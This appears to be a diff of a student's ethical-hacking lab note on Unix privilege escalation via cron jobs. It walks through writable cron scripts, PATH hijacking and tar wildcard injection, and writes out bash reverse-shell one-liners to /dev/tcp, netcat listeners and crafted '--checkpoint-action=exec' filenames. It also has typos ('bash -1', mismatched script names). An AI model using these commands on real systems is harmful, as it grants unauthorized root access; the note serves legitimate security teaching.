EnriFort/MSc-Cybersecurity/Ethical Hacking/ethLabNote.md

 ## 06 - Hacking Unix p2

 ### Exploiting cronjobs
 Cron is a task scheduler on Unix-like systems, which allows defining commands to execute periodically.
-Schedules specified in cron expressions within crontab files.
+Schedules are specified in cron expressions within crontab files.
 You can use `crontab -l` to show cronjobs for the current user.
-Cron jobs often do maintenance for services often running root.
+Cron jobs often do maintenance for services often running **root**.
 If we can tamper with what those cron jobs are executing, we can execute commands as root.
+We are going to see 3 different methods.

+#### Method 1 - Writable cron scripts
+The `overwrite.sh` script is executed every minute and it's world-writeable.
+You can write inside the script to create a bind or reverse shell:
+1. Create a listening server with **netcat** on the local machine:
+	- `nc -lp 8888`
+2. Overwrite `overwrite.sh` with:
+	- `bash -1 >& /dev/tcp/127.0.0.1/8888 0>&1`
+3. Wait for the cron job to be executed

+As we have seen before, this cron job is executed every minute with the root user.
+So, on average after 30 seconds, Privilege Escalation is achieved: we got a root shell.

+#### Method 2 - Insecure crontab PATH
+`overwrite.sh`is executed using its relative path &rarr; `bin/sh` will search it in each directory in the PATH env variable.

+Can we write in any of the directories in PATH coming **before** the location of `overwrite.sh`?
+1. Create a listening server with **netcat** on the local machine:
+	- `nc -lp 7777`;
+2. Create a file named `overwrite.sh` in `/home/user/` containing, make it executable:
+	- `#!/bin/sh`;
+	- `bash -i >& /dev/tcp/127.0.0.1/7777 0>&1`.
+3. Wait for the cron job to be executed.

+#### Method 3 - Insecure scripts
+The * wildcard is expanded by the shell and passed to the command (tar in this case).
+Checking on [GTFOBins](https://gtfobins.github.io/gtfobins/tar/) we learn that **tar** can execute external commands as part of a checkpoint feature:
+1. Create listening server with **netcat** on the local machine:
+	- `nc -lp 9999`;
+2. Create an executable script, named `myshell.sh`, in the user directory:
+	- `#!/bin/sh`;
+	- `bash -i >& /dev/tcp/127.0.0.1/9999 0>&1`.
+3. Create fake files in the user home (where the * is expanded), to trick **tar**:
+	- `touch /home/user/--checkpoint=1`;
+	- `touch /home/user/--checkpoint-action=exec=shell.elf`.
+4. Wait for the cron job to be executed.

+What happened?
+After wildcard expansion, **tar** has been executed as:
+	- `tar czf /tmp/backup.tar.gz \
+			--checkpoint=1 --checkpoint-action=exec=myshell.sh myshell.sh tools`

 ### Password and keys
 Having an initial foothold on a system means that we can gather more details like: